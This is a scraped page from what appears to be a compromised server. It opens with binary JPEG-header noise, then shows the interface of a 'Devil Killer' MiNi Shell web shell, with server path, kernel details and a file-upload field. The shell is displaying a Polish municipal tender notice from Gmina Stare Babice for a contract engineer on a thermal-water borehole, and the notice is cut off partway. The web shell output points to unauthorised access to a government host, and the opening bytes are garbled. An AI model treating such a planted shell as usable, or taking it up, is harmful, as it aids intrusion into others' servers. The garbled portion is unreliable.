JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250926/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250926/0044423801-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie funkcji Inżyniera Kontraktu dla zadania pn. „Wykonanie otworu poszukiwawczo-rozpoznawczego wód termalnych Zielonki-Parcela GT-1 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Stare Babice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013271855</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 32</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stare Babice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-082</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@stare-babice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://starebabice.bip.net.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie funkcji Inżyniera Kontraktu dla zadania pn. „Wykonanie otworu poszukiwawczo-rozpoznawczego wód termalnych Zielonki-Parcela GT-1 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1d546499-6345-44d9-a048-a4cca893c182</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00444238</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00030960/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.20 Pełnienie funkcji Inżyniera Kontraktu dla zadania pn. &#34;Wykonanie otworu poszukiwawczo-rozpoznawczego wód termalnych Zielonki-Parcela GT-1&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://starebabice.bip.net.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://starebabice.bip.net.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zgodnie z IX Rozdziałem SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.271.41.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest pełnienie funkcji Inżyniera kontraktu w ramach przedsięwzięcia „Wykonanie otworu poszukiwawczo – rozpoznawczego wód termalnych Zielonki Parcela GT – 1”.<br/>2.	Przedmiot zamówienia obejmuje:<br/>1)	Współpraca z Zamawiającym przy opracowaniu opisu przedmiotu zamówienia w szczególności w zakresie technicznym, ustalenia minimalnych wymagań technicznych i warunków udziału <br/>w postępowaniu, ustalenia niezbędnych dokumentów zamówienia oraz ich sporządzenie, <br/>tj. m.in.: <br/>a)	opracowanie kosztorysu inwestorskiego dla wszystkich robót zgodnie z obowiązującymi przepisami w formacie pdf oraz ath,<br/>b)	wykonanie i opracowanie przedmiaru robót dla wszystkich robót zgodnie z obowiązującymi przepisami w formacie pdf oraz ath,<br/>c)	opracowanie harmonogramu robót,<br/>ponadto weryfikacja treści Projektu robót geologicznych przedsięwzięcia, doradztwo w zakresie przeprowadzenia postępowania w zamówieniu na wybór wykonawcy robót wiertniczych <br/>w ramach przedsięwzięcia polegające na oddelegowaniu merytorycznej osoby lub osób <br/>(w zależności od potrzeb) do współpracy z Zamawiającym w trakcie całego procesu prowadzenia procedury wyłonienia wykonawcy prac wiertniczych, w tym w szczególności: przygotowanie merytorycznych odpowiedzi na ewentualne pytania wykonawców, analiza zadanych pytań pod kątem wpływu na dokumenty postępowania, ocena ofert, a także udział w ewentualnych postępowaniach przed KIO i sądami powszechnymi i administracyjnymi (pomoc przy sporządzaniu pism, doradztwo, udział w rozprawach);<br/>2)	sprawowanie nadzoru geologicznego zgodnie z obowiązującymi przepisami i standardami branży oraz podejmowanie czynności mających na celu ochronę interesów Zamawiającego w ramach realizowanego przedsięwzięcia;<br/>3)	sprawowanie dozoru geologicznego podczas wykonywania przedsięwzięcia określonych w dokumencie pn. „Projekt robót geologicznych na wykonanie otworu poszukiwawczo-rozpoznawczego wód termalnych Zielonki-Parcela GT-1” z uwzględnieniem modyfikacji wprowadzonych przez nadzór geologiczny;<br/>4)	sprawowanie nadzoru nad wykonawcą robót wiertniczych, w tym m.in.:<br/>a)	przygotowanie harmonogramu prac wraz z prognozą potrzeb w zakresie zasobów kadrowych i technicznych;<br/>b)	nadzór i kontrola nad realizacją założonego harmonogramu robót wiertniczych;<br/>c)	doradztwo i rekomendowanie potencjalnych rozwiązań w sprawach dotyczących konstrukcji odwiertu, technologii prowadzenia prac itp.,<br/>d)	udział w podejmowaniu decyzji, w tym rekomendowanie rozwiązań i wydawanie decyzji podczas prowadzenia robót wiertniczych, w szczególności w zakresie metod, technologii <br/>i efektywności prowadzonych prac zgodnie z obowiązującymi przepisami i przyjętymi <br/>w branży standardami postępowania;<br/>e)	opiniowanie i doradztwo w zakresie rozwiązywana problemów technicznych wynikłych <br/>w trakcie wykonywanych prac,<br/>f)	nadzorowanie wykonywania prac serwisowych na terenie prowadzonych robót, <br/>g)	opracowanie wytycznych postępowania z substancjami i preparatami chemicznymi na terenie prowadzonych robót,<br/>h)	nadzór bezpieczeństwa nad stosowaniem substancji i preparatów chemicznych na ternie objętym robotami,<br/>i)	współpraca z organami nadzoru, właściwymi miejscowo dla Zamawiającego;<br/>5)	prowadzenie dokumentacji związanej ze sprawowaniem nadzoru i dozoru geologicznego;<br/>6)	udział w naradach koordynacyjnych oraz przekazywanie informacji w tym zakresie dla wszystkich stron realizowanego przedsięwzięcia jak i prowadzenie niezbędnej dokumentacji z narad koordynacyjnych;<br/>7)	informowanie Zamawiającego o postępie robót wiertniczych, ewentualnych trudnościach <br/>i potencjalnych zagrożeniach w ramach realizowanego przedsięwzięcia; <br/>8)	współpraca z Zamawiającym i wykonawcą robót wiertniczych w trakcie realizacji przedsięwzięcia oraz doradztwo merytoryczne przy rozstrzyganiu trudności natury technicznej i organizacyjnej;<br/>9)	wykonywanie laboratoryjnych badań prób pozyskanych w ramach realizacji przedsięwzięcia obejmujące swym zakresem między innymi:<br/>a)	badania laboratoryjne próbek okruchowych i rdzeni – dla pobranych z rdzeni wiertniczych próbek Zamawiający oczekuje przeprowadzenia następujących badań: <br/>-	porowatości i przepuszczalności,<br/>-	petrograficznych – analiza uziarnienia skał w płytkach cienkich,<br/>-	stratygraficznych – w celu określenia wieku skał (opcjonalnie).<br/>Na podstawie przeprowadzonych analiz dodatkowo może zostać wykonane badanie wieku skał na wybranych próbkach okruchowych. Dokładna liczba próbek skał przekazanych do badań zostanie określona przez nadzór geologiczny w oparciu o bieżące wyniki wiercenia.<br/>b)	badania laboratoryjne próbek wody termalnej i gazów rozpuszczonych w wodzie – dla pobranych podczas testów hydrodynamicznych próbek wody i gazu Zamawiający oczekuje przeprowadzenia następujących analizy:<br/>-	fizyko-chemicznej wody, w celu określenia następujących wskaźników: twardość wody (ogólnej, węglanowej i niewęglanowej), zasadowość, suma składników stałych, mineralizacja ogólna, krzemionka jako H2SiO2, kwas metakrzemowy H2SiO3, barwa, mętność, zapach, smak, odczyn, potencjał redox, przewodność elektrolityczna właściwa; (Na+), (K+), (Li+), (Ca+2), (Mg+2), (Ba+2), (Sr+2), (Fe+2), (Mn+2), (Zn+2), (Cu+2), (Ni+2),(Co+2), (Pb+2), (Cd+2), (Al+3), (Cr+3), (Mo+6), (V+5), (As+3), (Ti+2); (Cl-), (Br -), (J -), (SO4-2), (HCO3-2), (NO2-), (NO3-), (PO4-3), (BO3-3), (HBO2), CO2, Rn, H2S;<br/>-	mikrobiologicznej – składu izotopowego tlenu i wodoru (d18O i d2H) dla określenia wieku wody oraz stężenia trytu (T) dla określenia występowania składowej współczesnej, tzn. wody zasilanej po 1952 roku.<br/>10)	opracowywanie i czynne uczestniczenie w procedurze zatwierdzenia dokumentacji hydrogeologicznej w ramach realizacji przedsięwzięcia, uwzględniające sposób postępowania <br/>w zależności od uzyskanego wyniku tj. <br/>a)	w przypadku nawiercenia poziomów wód termalnych wyniki przeprowadzonych w otworze prac wraz z ich interpretacją oraz określeniem stopnia osiągnięcia zamierzonego celu zostaną przedstawione w dokumentacji hydrogeologicznej ustalającej zasoby eksploatacyjne ujęcia wód termalnych, zgodnie z Rozporządzeniem Ministra Środowiska z dnia 18 listopada 2016 r. w sprawie dokumentacji hydrogeologicznej i dokumentacji geologiczno-inżynierskiej.<br/>b)	w przypadku nie nawiercenia poziomów wód termalnych sporządzenie dokumentacji geologicznej prac geologicznych niekończących się udokumentowaniem zasobów (zgodnie <br/>z Rozporządzeniem Ministra Klimatu i Środowiska z dnia 23 grudnia 2020 r. w sprawie innych dokumentacji geologicznych;<br/>10)	gromadzenie i przechowywanie, we współdziałaniu ze wszystkimi Stronami realizowanego przedsięwzięcia, materiałów analitycznych, niezbędnych do późniejszego rozliczenia wykonanych prac i oceny osiągniętych efektów rzeczowych i finansowych;<br/>11)	doradztwo i współpraca z Zamawiającym w udzielaniu odpowiedzi na pytania Instytucji finansującej realizację przedsięwzięcia;<br/>12)	wykonywanie i przekazywanie Zamawiającemu miesięcznych raportów z postępu prac przy realizacji przedsięwzięcia począwszy od momentu zawarcia umowy z wykonawcą robót wiertniczych;<br/>13)	przygotowywanie dokumentacji, raportów, sprawozdań, rozliczeń oraz innych dokumentów <br/>z realizacji przedsięwzięcia wynikających z umowy o dofinansowanie z NFOŚiGW lub przepisów prawa mającego zastosowanie w danym przedmiocie umowy;<br/>14)	udział w przeglądach w okresie rękojmi; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71332000-4 - Geotechniczne usługi inżynieryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71351220-1 - Geologiczne usługi doradcze</p> <p class="mb-0">71351900-2 - Usługi geologiczne, oceanograficzne i hydrologiczne</p> <p class="mb-0">71351910-5 - Usługi geologiczne</p> <p class="mb-0">71355200-3 - Wykonywanie badań</p> <p class="mb-0">85312300-2 - Usługi dozoru i doradztwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2027-06-14</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający w okresie 3 lat od udzielenia zamówienia podstawowego przewiduje udzielenie zamówień, których przedmiot będzie polegał na powtórzeniu usług podobnych do tych, jakie stanowią przedmiot niniejszego zamówienia, a ich wartość całkowita nie przekroczy 100 000 zł i została uwzględniona w całkowitej wartości zamówienia.<br/>Ewentualny zakres tych zamówień obejmuje w szczególności wykonanie usług, które stanowią przedmiot zamówienia w zamówieniu podstawowym, tj. pełnienie funkcji Inżyniera Kontraktu podczas realizacji zadania inwestycyjnego związanego z wykonaniem otworu poszukiwawczo-rozpoznawczego, pełnienie funkcji Inżyniera Kontraktu po terminie wykonania umowy podstawowej w przypadku przedłużenia umowy z wykonawcą robót, pełnienie funkcji Inżyniera Kontraktu w przypadku wystąpienia robót nieprzewidzianych w dokumentacji projektowej, a które to roboty zostaną zlecone do wykonania wykonawcy robót.<br/>Zamówienia, o których mowa powyżej zostaną udzielone na warunkach określonych w odrębnej umowie, po przeprowadzeniu negocjacji z Wykonawcą zamówienia podstawowego w trybie z wolnej ręki na podstawie ustawy pzp. Decyzję w tym zakresie podejmuje Zamawiający.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie Kierownika Projektu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, co najmniej 2 zadania (realizowane na podstawie dwóch odrębnych umów) polegające na pełnieniu funkcji Inżyniera kontraktu, którego częścią było pełnienie nadzoru i dozoru geologicznego oraz rozliczenie finansowe kontraktu, w trakcie realizacji prac wiertniczych (wykonywania otworu poszukiwawczo-rozpoznawczego w celu ujęcia wód termalnych) o wartości minimum 250 000 zł brutto;<br/>2)	Wykonawca wykaże, że dysponuje lub będzie dysponował na etapie realizacji umowy:<br/>a)	jedną osobą pełniącą funkcję Kierownika Projektu, który brał udział (jako członek zespołu nadzorczego) przy sporządzaniu minimum 2 zatwierdzonych dokumentacji hydrogeologicznych ustalających zasoby eksploatacyjne wód termalnych dla otworów geotermalnych <br/>o głębokości minimum 1800 m p.p.t., przy czym osoba ta jest autorem lub współautorem zatwierdzonej dla tych otworów dokumentacji;<br/>b)	jedną osobą sprawującą nadzór geologiczny, która posiada kwalifikacje geologiczne kategorii IV zgodnie z wymogami wynikającymi z przepisów prawa geologicznego i górniczego potwierdzone świadectwem stwierdzającym kwalifikacje do wykonywania, dozorowania i kierowania pracami geologicznymi oraz posiada doświadczenie w sprawowaniu minimum 2 nadzorów geologicznych podczas wiercenia otworów geotermalnych o głębokości minimum 1800 m p.p.t.;<br/>c)	jedną osobą, pełniącą funkcję kierownika dozoru geologicznego, która posiada kwalifikacje geologiczne kategorii IV lub XIII zgodnie z wymogami wynikającymi z przepisów prawa geologicznego i górniczego, potwierdzone świadectwem stwierdzającym kwalifikacje do wykonywania, dozorowania i kierowania pracami geologicznymi oraz posiada doświadczenie zdobyte podczas dozorowania minimum 2 otworów geotermalnych o głębokości minimum 1800 m p.p.t.,<br/>d)	czterema osobami, będącymi członkami zespołu dozoru geologicznego – każda z osób musi posiadać kwalifikacje geologiczne kategorii IV lub XIII zgodnie z wymogami wynikającymi z przepisów prawa geologicznego i górniczego potwierdzone świadectwem stwierdzającym kwalifikacje do wykonywania, dozorowania i kierowania pracami geologicznymi oraz posiada udokumentowane doświadczenie podczas dozorowania minimum 1 otworu geotermalnego o głębokości minimum 1800 m p.p.t.;<br/>e)	jedną osobą specjalistą ds. wierceń, posiadającym kwalifikacje do wykonywania czynności wyższego dozoru ruchu specjalności wiertniczej w zakładach wykonujących roboty geologiczne zgodnie z ustawą z dnia 9 czerwca 2011 r. prawo geologiczne i górnicze tj. osoba ta musi posiadać świadectwo wydane przez Okręgowy Urząd Górniczy potwierdzające w/w kwalifikacje oraz posiadać udokumentowane doświadczenie podczas dozorowania minimum 1 otworu geotermalnego o głębokości minimum 1800 m p.p.t.; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z Rozdziałem IV SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z Rozdziałem IV SWZ</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zgodnie z Rozdziałem XIII SWZ <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Na podstawie art. 281 ust. 4 ustawy Zamawiający żąda od Wykonawców wniesienia wadium.<br/>2.	Każdy Wykonawca biorący udział w przetargu musi przed upływem terminu składania ofert wnieść wadium w wysokości 4 000 zł (słownie: cztery tysiące złotych);<br/>3.	Wadium może być wnoszone w następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>4.	Wadium wnoszone w pieniądzu:<br/>1)	należy wpłacić przelewem na rachunek Urzędu Gminy Stare Babice na konto w Banku Handlowym w Warszawie nr rachunku 13 1030 1508 0000 0008 2366 0009, przy czym Zamawiający musi otrzymać z banku potwierdzenie wpływu przelewu najpóźniej w dniu składania ofert przed upływem terminu ich składania (godzina). Za skuteczność operacji finansowo – bankowych odpowiada Wykonawca. Kopię przelewu należy dołączyć do oferty z zaznaczeniem, że dotyczy postępowania BZP.271.41.2025 pn.: „Pełnienie funkcji Inżyniera Kontraktu dla zadania pn. „Wykonanie otworu poszukiwawczo-rozpoznawczego wód termalnych Zielonki-Parcela GT-1”<br/>2)	za datę wniesienia wadium uznaje się datę uznania rachunku Zamawiającego,<br/>3)	Zamawiający dokona sprawdzenia czasu wpływu wadium na swoje konto. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z VII Rozdziałem SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: 